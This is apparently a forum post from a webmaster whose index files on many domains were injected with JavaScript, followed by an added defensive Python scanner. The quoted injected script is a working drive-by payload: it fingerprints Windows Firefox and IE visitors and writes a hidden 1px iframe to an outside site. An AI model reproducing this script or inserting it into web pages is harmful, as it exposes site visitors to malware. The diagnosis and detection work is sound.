So I have about 20 domains spread across a few HostGator accounts, and I have my own dedicated server at ThePlanet that has some websites on it. All have different logins. Every single index.html or index.php had this code added to the bottom of it at around 2am last night, and the file permissions were changed to 777.
I don't know wtf that is but it caused all my websites to stop responding.
The code was added to a couple dozen html/php files within like a couple of minutes. My first thought, and probably anyone else's, is: well, if it's across multiple accounts all with different passwords and on my dedicated as well, then my local machine is compromised. I run the latest Windows updates with McAfee updated and firewalls on; it did not find anything. So I fully uninstalled McAfee, purchased full Avast and ran that, and it did not find anything either. So I purchased Malwarebytes and ran that, and it does not find anything either. I am pretty careful about everything: I am constantly looking at what processes are running in Task Manager, and there is nothing there I don't recognize. I check msconfig to make sure nothing gets added there. I must be doing something wrong (Yeah, you were running McAfee, jackass).
The only thing that all of the accounts have in common is that I have the logins saved in FileZilla, and that is the only way I am thinking it could have happened. Could there be like a Java or web attack that could have executed rogue code on some website and just uploaded my FileZilla logins too?
I checked root on the box; it doesn't seem like anyone else has logged in or run any commands and such, and none of my Gmail accounts show any suspicious logins on them. My debit/credit cards that I use daily for online purchases don't show any suspicious charges. Any idea what the hell happened?
Code:
</html><script>
// Injected payload, reformatted from the single-line original; behaviour unchanged.
// It fingerprints the visitor's browser/OS and, for Firefox or IE on Windows,
// writes a 1x1 hidden iframe once per day, using the geo_idn cookie as a marker.
var BrowserDetect = {
    init: function () {
        this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
        this.version = this.searchVersion(navigator.userAgent)
            || this.searchVersion(navigator.appVersion)
            || "an unknown version";
        this.OS = this.searchString(this.dataOS) || "an unknown OS";
    },
    searchString: function (data) {
        for (var i = 0; i < data.length; i++) {
            var dataString = data[i].string;
            var dataProp = data[i].prop;
            this.versionSearchString = data[i].versionSearch || data[i].identity;
            if (dataString) {
                if (dataString.indexOf(data[i].subString) != -1) return data[i].identity;
            } else if (dataProp) return data[i].identity;
        }
    },
    searchVersion: function (dataString) {
        var index = dataString.indexOf(this.versionSearchString);
        if (index == -1) return;
        return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
    },
    dataBrowser: [
        { string: navigator.userAgent, subString: "Firefox", identity: "Firefox" },
        { string: navigator.userAgent, subString: "MSIE", identity: "Explorer", versionSearch: "MSIE" }
    ],
    dataOS: [
        { string: navigator.platform, subString: "Win", identity: "Windows" }
    ]
};

// Sets a cookie that expires dtDaysExpires days from now.
function addCookie(szName, szValue, dtDaysExpires) {
    var dtExpires = new Date();
    var dtExpiryDate = "";
    dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
    dtExpiryDate = dtExpires.toGMTString();
    document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}

// Returns the value of the named cookie, or "" if it is not set.
function findCookie(szName) {
    var i = 0;
    var nStartPosition = 0;
    var nEndPosition = 0;
    var szCookieString = document.cookie;
    while (i <= szCookieString.length) {
        nStartPosition = i;
        nEndPosition = nStartPosition + szName.length;
        if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
            nStartPosition = nEndPosition + 1;
            nEndPosition = document.cookie.indexOf(";", nStartPosition);
            if (nEndPosition < nStartPosition) nEndPosition = document.cookie.length;
            return document.cookie.substring(nStartPosition, nEndPosition);
            break;
        }
        i++;
    }
    return "";
}

BrowserDetect.init();
var szCookieString = document.cookie;
var boroda = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows"))
    && (findCookie('geo_idn') != 'v48a765e4f75baeb85f0a755fc3ec09c')) {
    addCookie("geo_idn", "v48a765e4f75baeb85f0a755fc3ec09c", 1);
    document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');
} else {}
</script>
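An added defender-side check (example code, not from the original post): a scanner that walks a web root for the index.html/index.php files the post names, flags the three indicators visible in the quoted snippet (a script block appended after the closing html tag, the geo_idn marker cookie, and a 1px hidden iframe), and reports files left world-writable (777). The sample strings are constructed for a self-check and example.invalid is a placeholder host.

```python
import os
import re
import stat

# Indicators drawn from the injected snippet quoted in the post.
INDICATORS = {
    "script_after_html_close": re.compile(r"</html>\s*<script", re.I),
    "geo_idn_cookie": re.compile(r"geo_idn"),
    "hidden_1px_iframe": re.compile(
        r"<iframe[^>]*height\s*=\s*\"?1px\"?[^>]*width\s*=\s*\"?1px\"?", re.I),
}

TARGET_NAMES = {"index.html", "index.htm", "index.php"}

def classify_content(text):
    """Return the names of the indicators present in one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def is_world_writable(mode):
    """True for a 777-style mode (any mode with the other-write bit set)."""
    return bool(mode & stat.S_IWOTH)

def scan_tree(root):
    """Walk a web root and report index files that carry indicators or 777 perms."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() not in TARGET_NAMES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = classify_content(fh.read())
                mode = os.stat(path).st_mode
            except OSError:
                continue
            if hits or is_world_writable(mode):
                findings.append({"path": path, "indicators": hits,
                                 "world_writable": is_world_writable(mode),
                                 "mode": oct(stat.S_IMODE(mode))})
    return findings

# Constructed samples (not taken from any real site) for a quick self-check.
CLEAN_SAMPLE = "<html><body><p>hello</p></body></html>\n"
INFECTED_SAMPLE = CLEAN_SAMPLE + (
    "<script>addCookie(\"geo_idn\",\"v\",1);document.write('<iframe "
    "src=\"http://example.invalid\" height = \"1px\" width = \"1px\"></iframe>');</script>")

if __name__ == "__main__":
    import sys
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

Run it against each account's web root after restoring the files from a clean backup; any file it still lists has either not been cleaned or has kept the 777 mode the intruder set.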